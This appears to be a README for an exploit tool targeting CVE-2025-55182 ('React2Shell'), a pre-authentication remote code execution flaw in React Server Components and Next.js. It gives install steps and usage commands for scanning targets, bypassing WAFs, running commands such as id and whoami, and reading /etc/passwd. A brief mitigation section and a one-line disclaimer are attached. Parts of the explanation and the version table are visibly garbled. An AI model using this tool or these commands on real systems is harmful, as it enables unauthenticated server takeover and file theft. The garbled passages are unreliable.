
Pre-authentication RCE exploit for CVE-2025-55182 (React2Shell) targeting React Server Components. Features scanning, OAST verification, WAF bypass, command execution, and file reading.
Pre-authentication Remote Code Execution in React Server Components (RSC), Next.js, and related frameworks.
CVE-2025-55182 (also referred to as React2Shell) is a critical pre-authentication RCE vulnerability affecting the React Server Components (RSC) ecosystem. An unauthenticated attacker can fully compromise a vulnerable server with a single crafted HTTP POST request.
React Server Components uses a custom wire format called React Flight to serialize function references and module calls. The vulnerability exists in the payload decoding mechanism that processes incoming POST requests to RSC endpoints.
When the server receives a React Flight payload, it deserializes the content without adequate validation, trusting attacker-controlled $$typeof fields and module reference resolution. This allows an attacker to:
child_process, fs, net)$F (function) type marker| Package | Vulnerable | Patched |
|---|---|---|
react-server-dom-webpack | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
react-server-dom-parcel | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
react-server-dom-turbopack | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
next (13.x) | 13.3.0 – 13.5.x | ≥ 14.2.35 |
next (14.x) | 14.0.0 – 14.2.34 | ≥ 14.2.35 |
next (15.x) | 15.0.0+ (see patch) | patched releases |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical
id, whoami)./etc/passwd, package.json).git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt
Usage
Basic Scan
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json
Verify RCE with OAST
python3 poc.py -t https://target.com -m verify --oast your.oast.domain
Full Bypass Testing
python3 poc.py -t https://target.com -m bypass --verbose
Execute Commands
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20
Read Files
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"
Using a Proxy (e.g., Burp Suite)
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080
File Structure
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
├── __init__.py
├── payloads.py
├── scanner.py
├── bypass.py
└── rce.py
Mitigation
Patch (Recommended)
npm install [email protected]
npm install [email protected] [email protected]
Temporary Workarounds
· Disable Server Functions ("use server") · WAF rules to block Content-Type: text/x-component · Network segmentation for RSC endpoints
References
· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Disclaimer: For authorized security testing only.
Author: SentinelX · https://t.me/SentinelXsecurity